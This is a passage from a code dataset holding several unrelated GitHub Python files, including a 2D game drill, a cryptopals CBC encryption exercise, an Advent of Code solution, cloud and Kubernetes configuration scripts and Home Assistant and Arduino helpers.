event.key in (SDLK_RIGHT, SDLK_LEFT, SDLK_UP, SDLK_DOWN): #stop moving when any arrow key is released\n dir = 0\n \n\n\nopen_canvas(TUK_WIDTH, TUK_HEIGHT)\nkpu_ground = load_image('TUK_GROUND.png')\ncharacter = load_image('animation_sheet.png')\n\nrunning = True\nx, y = TUK_WIDTH // 2, TUK_HEIGHT // 2\nframe = 0\nhide_cursor()\nL_R_check = 1\ndir = 0 #no movement until a key is pressed\n\nwhile running:\n clear_canvas()\n kpu_ground.draw(TUK_WIDTH // 2, TUK_HEIGHT // 2)\n if L_R_check == 1 and dir != 0:\n character.clip_draw(frame * 100, 100 * 1, 100, 100, x, y)\n elif L_R_check == 2 and dir != 0:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n elif L_R_check == 1 and dir == 0:\n character.clip_draw(frame * 100, 100 * 3, 100, 100, x, y)\n elif L_R_check == 2 and dir == 0:\n character.clip_draw(frame * 100, 100 * 2, 100, 100, x, y)\n\n update_canvas()\n frame = (frame + 1) % 8\n if dir == 1:\n if x < TUK_WIDTH:\n x += 5\n elif dir == 2:\n if x > 0:\n x -= 5\n elif dir == 3:\n if y < TUK_HEIGHT:\n y += 5\n elif dir == 4:\n if y > 0:\n y -= 5\n delay(0.01)\n handle_events()\n\nclose_canvas()\n\n\n\n\n","repo_name":"dennis-1215/2019180010_2DGP_DRILL","sub_path":"08/TUK_character_move.py","file_name":"TUK_character_move.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38388143810","text":"from hashlib import md5\nfrom base64 import b64decode\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\nfrom copy import deepcopy\nfrom os import urandom\nfrom random import randint\n\n\nkey = urandom(16)\n\ndef padding(block_size,s):\n tmp = len(s)%block_size\n if (tmp == 0):\n tmp = block_size\n else:\n tmp = block_size - tmp\n tmp_string = \"\"\n for i in 
range(tmp):\n tmp_string = tmp_string + chr(tmp) #PKCS#7-style: each pad byte holds the pad length\n return s+tmp_string\n\ndef xor(a,b):\n\t#byte-wise XOR of a block (str or bytes) with the bytes iv\n\tif isinstance(a, str):\n\t\ta = a.encode('latin-1')\n\treturn bytes(x ^ y for x, y in zip(a, b))\n\ndef encrypt_cbc(key,m,iv = b'\\x00'*16):\n\ttmp = len(iv)\n\tm = padding(tmp,m)\n\tcipher_text = b\"\" #AES works on bytes, so collect the ciphertext as bytes\n\tcbc_obj = AES.new(key, AES.MODE_ECB)\n\tfor i in range(0,len(m),tmp):\n\t\tsubstr = m[i:i+tmp]\n\t\txor_m = xor(substr,iv)\n\t\tiv = cbc_obj.encrypt(xor_m)\n\t\tcipher_text = cipher_text + iv\n\treturn cipher_text\n\n\ndef fun_1(m):\n\tprefix = 'comment1=cooking%20MCs;userdata='\n\tsuffix = ';comment2=%20like%20a%20pound%20of%20bacon'\n\tm = m.replace('=','').replace(';','').replace('%','')\n\tm = prefix + m + suffix\n\tcipher_text = encrypt_cbc(key,m)\n\treturn cipher_text\n\n","repo_name":"Singh-Rishabh/crypto_pals","sub_path":"set2/q16.py","file_name":"q16.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39006545154","text":"data = [line.strip() for line in open(\"input.txt\", 'r')]\n\ndef gcd(a,b):\n #extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)\n if a == 0:\n return (b, 0, 1)\n g, y, x = gcd(b % a, a)\n return (g, x - (b // a) * y ,y)\n\ndef modu(n, p):\n #modular inverse of n modulo p (valid only when gcd(n, p) == 1)\n g, inv, y = gcd(n, p)\n assert g == 1\n return inv % p\n\ndef chinese_remainder_theorem(buses, modulo):\n x = 0\n for a, p in buses:\n n = modulo // p\n inverse = modu(n, p)\n x = (x+a*n*inverse) % modulo\n return x % modulo\n\ndeparture_time = data[0]\nvalues = data[1].split(',')\nusedVals = []\nfinalValues = []\n\nfor val in values:\n if(val != \"x\"):\n usedVals.append(val)\n\nfor val in usedVals:\n time = 0\n while(time < int(departure_time)):\n time += int(val)\n finalValues.append(time)\n\nbus = finalValues.index(min(finalValues))\n\nprint(\"Part A: \"+ str((finalValues[bus] - int(departure_time)) * int(usedVals[bus])))\n\ndef part2(buses):\n modulo = 1\n for i in buses:\n modulo *= i[1]\n return(chinese_remainder_theorem(buses, modulo))\n\npart_2 = []\nfor counter, i in enumerate(data[1].split(',')):\n if i != \"x\":\n part_2.append((-counter, int(i)))\n \nprint(\"Part B: \" + str(part2(part_2)))","repo_name":"joverandout/advent-of-code-2020","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14235115258","text":"'''ExecutionFilter data structure.'''\n\n__copyright__ = \"Copyright (c) 2008 Kevin J Bluck\"\n__version__ = \"$Id$\"\n\n\nclass ExecutionFilter(object):\n '''Data structure containing attributes to describe execution filter\n criteria.\n '''\n\n def __init__(self, client_id=0, acct_code=\"\", time=\"\", symbol=\"\",\n sec_type=\"\", exchange=\"\", side=\"\"):\n self.m_clientId = client_id\n self.m_acctCode = acct_code\n self.m_time = time\n self.m_symbol = symbol\n self.m_secType = sec_type\n self.m_exchange = exchange\n self.m_side = side\n\n\n def __eq__(self, other):\n if id(self) == id(other): return True\n if not isinstance(other, self.__class__): return False\n return True if (\n (self.m_clientId == other.m_clientId) and\n (self.m_acctCode.lower() == other.m_acctCode.lower()) and\n (self.m_time.lower() == other.m_time.lower()) and\n (self.m_symbol.lower() == other.m_symbol.lower()) and\n (self.m_secType.lower() == other.m_secType.lower()) and\n (self.m_exchange.lower() == other.m_exchange.lower()) and\n (self.m_side.lower() == other.m_side.lower())\n ) else 
False\n","repo_name":"kbluck/pytws","sub_path":"tws/_ExecutionFilter.py","file_name":"_ExecutionFilter.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26549050248","text":"from trainer import Trainer as Trainer_clDice\nfrom trainer_dice import Trainer as Trainer_Dice\nfrom Model.model import (\n ResidualAttentionUNet,\n AttentionUNet,\n UNet,\n ResidualAttentionDuckUNet,\n ResidualAttentionDuckNetwithEncoder\n)\nfrom lion_pytorch import Lion\nfrom Dataset.dataset import ETHDataset, MassachusettsDataset, GMapsDataset \nfrom segmentation_models_pytorch.losses import DiceLoss, JaccardLoss\nfrom Loss.cldice import SoftDiceClDice\nfrom Loss.combined_loss import DiceLovaszBCELoss\nimport os\nimport torch\nimport torchvision\nimport sys\nimport click\n\n@click.command()\n@click.option(\n \"--tmpdir\",\n \"-t\",\n type=str,\n)\ndef main(tmpdir):\n sys.stdout = open(sys.stdout.fileno(), mode=\"w\", buffering=1)\n sys.stderr = open(sys.stderr.fileno(), mode=\"w\", buffering=1)\n torch.manual_seed(0)\n # base_path = \"data/ethz-cil-road-segmentation-2023\"\n # image_path = os.path.join(base_path, \"training/images\")\n # mask_path = os.path.join(base_path, \"training/groundtruth\")\n # test_dataset = ETHDataset(image_path, mask_path, augment_images=False)\n\n # dataset = MassachusettsDataset('data/archive/tiff/train', 'data/archive/tiff/train_labels', augment_images=False)\n\n base_path = os.path.join(tmpdir , \"additional_data\")\n image_path = os.path.join(base_path, \"images\")\n mask_path = os.path.join(base_path, \"masks\")\n skeleton_path = os.path.join(base_path, \"skel\")\n dataset = GMapsDataset(\n image_path,\n mask_path,\n skel_path=skeleton_path,\n augment_images=True,\n #normalize=True,\n )\n\n model = ResidualAttentionDuckNetwithEncoder(3, 1)\n #model.load_state_dict(torch.load('best_model_weights_pretrained_clDice_duck_final.pth'))\n\n loss_fn = SoftDiceClDice(0.5) #DiceLovaszBCELoss(alpha=0.5, beta=0.3, gamma=0.2)\n optimizer = Lion(model.parameters(), lr=1e-4, weight_decay=1e-6)\n trainer = Trainer_clDice(\n model,\n dataset,\n None,\n loss_fn,\n optimizer,\n split_test=0.2,\n batch_size=16,\n epochs=30,\n test_metrics=[DiceLoss(mode=\"binary\"), JaccardLoss(mode=\"binary\")],\n test_metric_names=[\"DiceLoss\", \"JaccardLoss\"],\n epochs_between_safe=1,\n name=\"our_model_cl_dice_pretrained\",\n \n )\n scores = trainer.train_test()\n scores.to_csv(\"our_model_cl_dice_pretrain.csv\")\n\n base_path = \"data/ethz-cil-road-segmentation-2023\"\n image_path = os.path.join(base_path, \"training/images\")\n mask_path = os.path.join(base_path, \"training/groundtruth\")\n dataset = ETHDataset(image_path, mask_path, augment_images=False)\n\n loss_fn = DiceLoss(mode=\"binary\")\n optimizer = Lion(model.parameters(), lr=1e-5, weight_decay=1e-6)\n trainer = Trainer_Dice( \n model,\n dataset,\n None,\n loss_fn,\n optimizer,\n split_test=0.2,\n batch_size=16,\n epochs=30,\n test_metrics=[DiceLoss(mode=\"binary\"), JaccardLoss(mode=\"binary\")],\n test_metric_names=[\"DiceLoss\", \"JaccardLoss\"],\n epochs_between_safe=1,\n name=\"our_model_cl_dice\", \n )\n\n scores = trainer.train_test()\n scores.to_csv(\"our_model_cl_dice.csv\")\n\n\n\nif __name__ == \"__main__\": # use line-buffering for both stdout and stderr\n 
main()\n","repo_name":"ywattenberg/road_segmentation","sub_path":"src/train_our_model.py","file_name":"train_our_model.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440633525","text":"import argparse\nimport sys\nimport io\n\nfrom api.betting import BettingHandler\nfrom api.config import Config\nfrom api.database import Database\nfrom api.bets import get_betting_handler\nfrom discbot.discord_bot import DiscordClient\nfrom api.util import GUILD_MAP, SUPPORTED_GAMES\n\nCHANNEL_MAP = {\n \"nibs\": 730744358751567902,\n \"circus\": 805218121610166272,\n \"core\": 808796236692848650,\n \"test\": 512363920044982274\n}\n\nasync def write_message(client, message, channel_id):\n channel = client.get_channel(channel_id)\n try:\n needle = \"[mention:\"\n mention_index = message.index(needle)\n after_mention_index = message[mention_index + len(needle):]\n end_index = after_mention_index.index(\"]\")\n disc_id = message[mention_index + len(needle):mention_index + len(needle) + end_index]\n mention_str = discord_client.get_mention_str(int(disc_id), GUILD_MAP[args.guild])\n\n message = message.replace(f\"{needle}{disc_id}]\", mention_str)\n\n except ValueError:\n pass\n\n await channel.send(client.insert_emotes(message))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"guild\", choices=CHANNEL_MAP)\n\n args = parser.parse_args()\n\n input_stream = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\n lines = input_stream.readlines()\n\n if lines == []:\n print(\"Error: No message provided (should be input to stdin)\")\n exit(0)\n\n conf = Config()\n database_client = Database(conf)\n bet_client = BettingHandler(conf, database_client)\n betting_handlers = {game: get_betting_handler(game, conf, database_client) for game in SUPPORTED_GAMES}\n\n discord_client = DiscordClient(conf, database_client, bet_client)\n\n channel_id = CHANNEL_MAP[args.guild]\n message = \"\".join(lines)\n\n GUILD_MAP[\"test\"] = 512363920044982272\n\n discord_client.add_event_listener(\"onready\", write_message, discord_client, message, channel_id)\n\n discord_client.run(conf.discord_token)\n","repo_name":"mhso/IntFar","sub_path":"write_as_intfar.py","file_name":"write_as_intfar.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6399287974","text":"import json\nimport requests\nimport boto3\nimport datetime\nimport pytz\nimport os\nfrom botocore.exceptions import ClientError\n\n\ndef get_secrets():\n secret_name = os.getenv('SECRET_NAME')\n region_name = os.getenv('REGION_NAME')\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(service_name='secretsmanager', region_name=region_name)\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n raise e\n\n secrets = json.loads(get_secret_value_response['SecretString'])\n return secrets\n\n\ndef api_call(lat_home, lon_home, api_key):\n url = f\"https://adsbexchange-com1.p.rapidapi.com/v2/lat/{lat_home}/lon/{lon_home}/dist/250/\"\n\n headers = {\n \"X-RapidAPI-Key\": api_key,\n \"X-RapidAPI-Host\": \"adsbexchange-com1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers)\n return response\n\n\ndef upload_json_to_s3(response, bucket_name, lat_home, lon_home):\n now_timestamp = 
datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(\"%Y%m%d-%H%M%S\")\n out_key = f'adsb_raw/adsb_{lat_home}_{lon_home}_250--{now_timestamp}.json'\n\n s3 = boto3.client('s3')\n s3.put_object(\n Body=response.text,\n Bucket=bucket_name,\n Key=out_key\n )\n return out_key\n\n\ndef main():\n\n secrets = get_secrets()\n\n bucket_name = secrets[os.getenv('KEY_BUCKET_NAME')]\n lat_home = secrets[os.getenv('KEY_HOME_LATITUDE')]\n lon_home = secrets[os.getenv('KEY_HOME_LONGITUDE')]\n api_key = secrets[os.getenv('KEY_ADBS_EXCHANGE_API_KEY')]\n\n response = api_call(lat_home=lat_home, lon_home=lon_home, api_key=api_key)\n out_key = upload_json_to_s3(response=response, lat_home=lat_home, lon_home=lon_home, bucket_name=bucket_name)\n\n return f\"{response.json()['msg']} Processed records:{response.json()['total']} ctime:{response.json()['ctime']} s3://{bucket_name}/{out_key}\"\n\n\ndef handler(event, context):\n result = main()\n\n return {\n 'headers': {'Content-Type': 'application/json'},\n 'statusCode': 200,\n 'body': json.dumps({\"message\": f\"skyeyeLark invoked. {result}\",\n \"event\": event})\n }\n","repo_name":"MatthewHanni/sky-eye","sub_path":"lark_api_extract_load/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35928660609","text":"from time import sleep\r\nfrom datetime import timedelta, datetime\r\nimport aioblescan as aiobs\r\nimport asyncio\r\nimport time\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.helpers.event import async_track_time_interval\r\nimport random\r\nimport logging\r\nfrom homeassistant.const import (VOLUME_LITERS, STATE_UNKNOWN)\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\ninf={}\r\n\r\ndef update_counters(call):\r\n global scan_duration\r\n def my_process(data):\r\n if time.time()-start >int(scan_duration):\r\n btctrl.stop_scan_request()\r\n conn.close()\r\n event_loop.stop()\r\n ev=aiobs.HCI_Event()\r\n xx = ev.decode(data)\r\n try:\r\n mac = ev.retrieve(\"peer\")[0].val\r\n except:\r\n return\r\n if str(mac).find('b0:01:02') !=-1:\r\n manufacturer_data = ev.retrieve(\"Manufacturer Specific Data\") \r\n payload = manufacturer_data[0].payload\r\n payload = payload[1].val \r\n c_num = int.from_bytes(payload[6:8], byteorder='little')\r\n c_count = int.from_bytes(payload[9:12], byteorder='little')\r\n inf[c_num] = c_count/10\r\n start = time.time()\r\n event_loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(event_loop)\r\n mysocket = aiobs.create_bt_socket(0)\r\n fac=event_loop._create_connection_transport(mysocket,aiobs.BLEScanRequester,None,None)\r\n conn,btctrl = event_loop.run_until_complete(fac)\r\n btctrl.process=my_process\r\n btctrl.send_scan_request()\r\n\r\n try:\r\n event_loop.run_forever()\r\n except KeyboardInterrupt:\r\n print('keyboard interrupt')\r\n finally:\r\n print('closing event loop')\r\n btctrl.stop_scan_request()\r\n conn.close()\r\n event_loop.close()\r\n\r\n \r\ndef setup_platform(hass, config, add_entities, discovery_info=None):\r\n global scan_interval, scan_duration\r\n ha_entities=[]\r\n _LOGGER.error(config)\r\n scan_interval = config['scan_interval']\r\n scan_duration = config['scan_duration']\r\n for device in config['devices']: \r\n ha_entities.append(ExampleSensor(device['id'],device['name']))\r\n inf[device['id']]=STATE_UNKNOWN\r\n add_entities(ha_entities, True)\r\n async_track_time_interval(\r\n hass, update_counters, scan_interval\r\n )\r\n 
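\r\n# A sketch of the platform config setup_platform above appears to expect,\r\n# inferred from the keys it reads ('scan_interval', 'scan_duration',\r\n# 'devices' with 'id'/'name'); the exact YAML shape and the values shown\r\n# here are assumptions, not taken from the component's docs:\r\n#\r\n# sensor:\r\n#   - platform: elehant_water\r\n#     scan_interval: 60\r\n#     scan_duration: 20\r\n#     devices:\r\n#       - id: 1234\r\n#         name: Cold water meter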
\r\n\r\n\r\nclass ExampleSensor(Entity):\r\n \"\"\"Representation of a Sensor.\"\"\"\r\n\r\n def __init__(self,counter_num, name):\r\n \"\"\"Initialize the sensor.\"\"\"\r\n self._state = None\r\n self._name = name\r\n self._state = STATE_UNKNOWN\r\n self._num = counter_num\r\n\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return self._name\r\n\r\n @property\r\n def state(self):\r\n \"\"\"Return the state of the sensor.\"\"\"\r\n return self._state\r\n\r\n @property\r\n def unit_of_measurement(self):\r\n \"\"\"Return the unit of measurement.\"\"\"\r\n return VOLUME_LITERS\r\n @property\r\n def icon(self):\r\n \"\"\"Return the unit of measurement.\"\"\"\r\n return 'mdi:water-pump'\r\n @property\r\n def unique_id(self):\r\n \"\"\"Return Unique ID \"\"\"\r\n return 'elehant_'+str(self._num)\r\n\r\n def update(self):\r\n \"\"\"Fetch new state data for the sensor.\r\n This is the only method that should fetch new data for Home Assistant.\r\n \"\"\" \r\n # update_counters() \r\n self._state = inf[self._num]\r\n","repo_name":"nemoyar/elehant_water","sub_path":"custom_components/elehant_water/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4511201100","text":"# Done as per https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/05-kubernetes-configuration-files.md\n\nimport json\nimport pathlib\n\nfrom network import external_ips, in_vagrant, wireguard_ips\nfrom utils import run_command, set_file_contents\n\nkc_folder = None\nssl_folder = None\nssl_config_folder = pathlib.Path(\"./ssl/\")\n\nca_pem = None\n\nkubectl = pathlib.Path(__file__).parents[2].joinpath(\"kubectl\")\n\n\ndef make_configs(public_address):\n for name in [\n \"admin\",\n \"kube-controller-manager\",\n \"kube-proxy\",\n \"kube-scheduler\",\n \"service-account\",\n \"cni\",\n ]:\n make_config(name, public_address)\n\n\ndef make_config(name, public_address):\n kc = kc_folder.joinpath(f\"{name}.kubeconfig\")\n cert = ssl_folder.joinpath(f\"{name}.pem\")\n key = ssl_folder.joinpath(f\"{name}-key.pem\")\n newest_dep = sorted([x.stat().st_mtime for x in [ca_pem, cert, key]], reverse=True)[\n 0\n ]\n if kc.exists() and newest_dep < kc.stat().st_mtime:\n return\n run_command(\n f\"\"\"\n{kubectl} config set-cluster app \\\n --certificate-authority={ca_pem} \\\n --embed-certs=true \\\n --server=https://{public_address}:6443 \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-credentials system:{name} \\\n --client-certificate={cert} \\\n --client-key={key} \\\n --embed-certs=true \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-context default \\\n --cluster=app \\\n --user=system:{name} \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(f\"\"\"{kubectl} config use-context default --kubeconfig={kc}\"\"\")\n\n run_command(f\"touch {kc}\")\n\n\ndef make_node_config(host, public_address):\n kc = kc_folder.joinpath(f\"{host['name']}.kubeconfig\")\n kc_config = str(kc) + \".config\"\n cert = ssl_folder.joinpath(f\"keys-{host['name']}.pem\")\n key = ssl_folder.joinpath(f\"keys-{host['name']}-key.pem\")\n\n newest_dep = sorted([x.stat().st_mtime for x in [ca_pem, cert, key]], reverse=True)[\n 0\n ]\n changed = set_file_contents(kc_config, json.dumps({\"address\": public_address}))\n if (not changed) and kc.exists() and newest_dep < kc.stat().st_mtime:\n return\n\n run_command(\n f\"\"\"\n 
{kubectl} config set-cluster app \\\n --certificate-authority={ca_pem} \\\n --embed-certs=true \\\n --server=https://{public_address}:6443 \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-credentials system:node:{host['name']} \\\n --client-certificate={cert} \\\n --client-key={key} \\\n --embed-certs=true \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-context default \\\n --cluster=app \\\n --user=system:node:{host['name']} \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"{kubectl} config use-context default --kubeconfig={kc}\"\"\",\n )\n\n run_command(f\"touch {kc}\")\n\n\ndef main(config):\n global ssl_folder, ca_pem, kc_folder\n ssl_folder = pathlib.Path(config[\"data_path\"]).joinpath(\"ssl\")\n ca_pem = ssl_folder.joinpath(\"ca.pem\")\n kc_folder = pathlib.Path(config[\"data_path\"]).joinpath(\"kubeconfig\")\n\n wg = wireguard_ips()\n KUBERNETES_PUBLIC_ADDRESS = list(wg.values())[0]\n\n make_configs(KUBERNETES_PUBLIC_ADDRESS)\n if in_vagrant():\n make_config(\"vagrant\", \"127.0.0.1\")\n else:\n ext_ip = list(external_ips().values())[0]\n make_config(\"external\", ext_ip)\n for server in config[\"servers\"]:\n make_node_config(server, KUBERNETES_PUBLIC_ADDRESS)\n","repo_name":"palfrey/on-infrastructure","sub_path":"mitogen/kubernetes/kubeconfig.py","file_name":"kubeconfig.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71053846865","text":"#!/usr/bin/env python3.6\n# -*- Coding: UTF-8 -*-\n\"\"\"\nSearch for common elements in matrix.\nThe search is based in logical programming filosophy\nBy: E. S. Pereira\nVersion: 0.0.1\nDate: 12/09/2017\n\"\"\"\nfrom collections import OrderedDict\n\nfrom functools import reduce\nfrom itertools import product\nfrom numpy import where, array, intersect1d, in1d, concatenate\n\n\ndef _sub_common(result, common, match, args, hargs):\n if len(hargs) == 1:\n for i in match:\n if match[i][1] == hargs:\n return common[i], []\n\n for j, argi in enumerate(args):\n if all(k in argi for k in hargs):\n for i in match:\n if match[i][0] == j:\n to_get = [argi.index(hi) for hi in hargs]\n to_search = argi.index(match[i][1][0])\n lines = in1d(result[j][:, to_search], common[i]).nonzero()\n finalr = concatenate([result[j][lines, tgi]\n for tgi in to_get]).T\n break\n return finalr, []\n\n\ndef _in_common(result, args, hargs):\n common = []\n match = OrderedDict()\n\n for i, vali in enumerate(args):\n tmp = []\n for j, valj in enumerate(args[i + 1:], start=i + 1):\n if any(k in valj for k in vali):\n uniao = list(set(valj) & set(vali))\n match[i] = [j, uniao]\n to_search = [where(array(l) == uniao)[0] for l in [vali, valj]]\n tmp.append(result[i][:, to_search[0]])\n tmp.append(result[j][:, to_search[1]])\n if tmp:\n\n in_array = array(reduce(intersect1d, tmp))\n common.append(in_array)\n\n # if we have 4 inputs, and, we are compare each by each,\n # the max size of the Common list will be input size less one\n # If the size of common is lower than the size of args less one, for\n # some predicate, no value was found, and the rule is not true for all body\n # component.\n\n if len(common) < len(args) - 1:\n return [], []\n\n return _sub_common(result, common, match, args, hargs)\n\n\ndef in_common(result, args, hargs):\n \"\"\"\n Given a list o result and a list of args, return the common elements\n where the relation is mapping by args.\n \"\"\"\n\n uniao = None\n if len(args) 
== 1:\n return result[0]\n\n for i in args:\n if uniao is None:\n uniao = set(i)\n else:\n uniao = uniao & set(i)\n uniao = list(uniao)\n if uniao:\n to_search = [where(array(i) == uniao)[0] for i in args]\n tmp = [result[j][:, to_search[j]] for j in range(len(result))]\n common = array(reduce(intersect1d, tmp))\n\n return common, uniao\n\n return _in_common(result, args, hargs)\n\n\ndef concatenate_result(node, result, uniao, common, predicate):\n '''\n Given a array of results, the union args, the common values and a predicate\n concatenete the body result in a new result.\n '''\n\n tmp = []\n for i, item in enumerate(result):\n test = node.children_args[i][:]\n for uni in uniao:\n if uni in test:\n test.remove(uni)\n\n if test:\n tmp2 = []\n for cmi in common:\n for uni in uniao:\n to_get = where(~(array(node.children_args[i]) == uni))[0]\n to_search = where(array(node.children_args[i]) == uni)[0]\n tmp2 += item[:,\n to_get][where(item[:, to_search] == cmi)[0]\n ].T.tolist()\n\n tmp.append(tmp2)\n else:\n\n if [node.data[predicate].index(uni) for uni in uniao\n if uni in node.data[predicate]]:\n listcommon = [[cmk] for cmk in common.T.tolist()]\n tmp.append(listcommon)\n tmp2 = []\n\n for i in range(len(tmp[0])):\n tmp2.append(\n array(list(product(*[tmp[j][i] for j in range(len(tmp))]))))\n if tmp2:\n print(tmp2)\n node.result = concatenate(tmp2)\n","repo_name":"duducosmos/logml","sub_path":"commonsearch.py","file_name":"commonsearch.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41988738405","text":"# coding: utf-8\nfrom machine import UART\nimport select\nfrom time import sleep\nfrom _thread import start_new_thread\n\nclass ArduinoTele():\n def __init__(self):\n self.clear()\n\n def clear(self):\n self.data = \"\"\n self.isRecving = False\n\nclass ArduinoConn():\n _STX = 0x02\n _ETX = 0x03\n\n @staticmethod\n def _startRecvThread(func, args):\n print(\"_startRecvThread\")\n start_new_thread(func, args)\n\n def __init__(self, id=2, baud=115200):\n self._uart = UART(id, baud)\n\n def init(self, txPin=None, rxPin=None):\n self._uart.init(tx=txPin, rx=rxPin)\n\n def startRecvThread(self, callback):\n print(\"startRecvThread\")\n ArduinoConn._startRecvThread(self._recv, (callback,))\n print(\"startRecvThread end\")\n\n def send(self, message):\n buf = bytearray(chr(ArduinoConn._STX)) + bytearray(message.encode()) + bytearray(chr(ArduinoConn._ETX))\n self._uart.write(buf)\n\n def _recv(self, callback):\n tele = ArduinoTele()\n poller = select.poll()\n poller.register(self._uart, select.POLLIN)\n\n while True:\n events = poller.poll()\n print('events =', events)\n while self._uart.any():\n buf = self._uart.read(1)\n print(buf)\n if buf[0] == ArduinoConn._STX:\n print(\"-> STX\")\n tele.clear()\n tele.isRecving = True\n elif buf[0] == ArduinoConn._ETX:\n print(\"-> ETX\")\n if tele.isRecving:\n print(tele.data)\n callback(tele)\n tele.clear()\n elif tele.isRecving:\n tele.data += buf.decode()\n","repo_name":"Monorium/omega-comm-part","sub_path":"arduinoconn.py","file_name":"arduinoconn.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19456486024","text":"from __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom copy import deepcopy\nimport datetime\nfrom decimal import Decimal\nfrom future.utils import iteritems\nimport inspect\nimport 
json\nimport operator\nimport os\nfrom random import Random\nfrom six import with_metaclass\n\nfrom sqlalchemy.inspection import inspect as sqlalchemy_inspect\n\n\n# Watch when new FixtureUppers are created and register them to the class's global dictionary\nclass UpperWatcher(type):\n def __init__(cls, name, bases, clsdict):\n cls._UPPER_KEY = cls.get_upper_class_key()\n if cls._UPPER_KEY:\n cls._upper_classes[cls._UPPER_KEY] = cls\n super(UpperWatcher, cls).__init__(name, bases, clsdict)\n\n\nclass BaseFixtureUpper(with_metaclass(UpperWatcher, object)):\n _upper_classes = {}\n upper_aliases = {}\n all_fixtures_order = []\n\n def __init__(self, start_id=1, seed=None, upper_instances=None, **kwargs):\n self.start_id = start_id\n self.seed = seed\n\n self.fixtures = []\n self.defaults = getattr(self, 'defaults', {})\n self.seed_random()\n\n if upper_instances is None:\n upper_instances = {}\n\n self.upper_instances = upper_instances\n\n # Save most recent instance of upper\n # to upper map\n if getattr(self, '_UPPER_KEY', None):\n self.upper_instances[self._UPPER_KEY] = self\n\n @classmethod\n def get_upper_class_key(cls):\n # Don't register Base Fixture Upper Classes\n if cls.__name__ == 'BaseFixtureUpper':\n return None\n\n key = cls.__name__\n if key in cls._upper_classes:\n raise Exception('Fixture Upper with name %s exists, use another name' % key)\n return key\n\n @classmethod\n def sorted_fixtures_key(cls, f):\n return f\n\n def get_all_fixtures(self):\n list_of_lists = iter([\n instance.fixtures\n for key, instance\n in iteritems(self.upper_instances)\n ])\n return sorted(\n iter([fixture for fixture_list in list_of_lists for fixture in fixture_list]),\n key=self.sorted_fixtures_key\n )\n\n def seed_random(self, seed=None):\n seed = seed or self.seed\n self.random = Random()\n self.random.seed(seed)\n\n def get_passed_kwarg_keys(self):\n return ['start_id', 'seed']\n\n def get_upper(self, key, **kwargs):\n # Get alias of key if available\n key = self.upper_aliases.get(key, key)\n\n if key not in self.upper_instances:\n kwargs['upper_instances'] = self.upper_instances\n\n for kw in self.get_passed_kwarg_keys():\n if not kwargs.get(kw):\n kwargs[kw] = getattr(self, kw)\n\n self._upper_classes[key](**kwargs)\n return self.upper_instances[key]\n\n def randint(self, *args):\n return self.random.randint(*args)\n\n def override_defaults(self, defaults):\n # Make sure global class defaults are not overridden\n self.defaults = dict(deepcopy(self.defaults), **defaults)\n\n def reset_defaults(self):\n self.defaults = self.__class__.defaults\n\n def fixup(self, **kwargs):\n raise NotImplementedError\n","repo_name":"Rhathe/fixtureupper","sub_path":"fixtureupper/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24245347700","text":"# External imports\nfrom aws_cdk import aws_events\nfrom constructs import Construct\n\n\nclass EventRuleConstruct(Construct):\n \"\"\"\n Construct to create an AWS EventBridge Rule with allow-all event pattern.\n \"\"\"\n\n def __init__(\n self,\n scope: Construct,\n id: 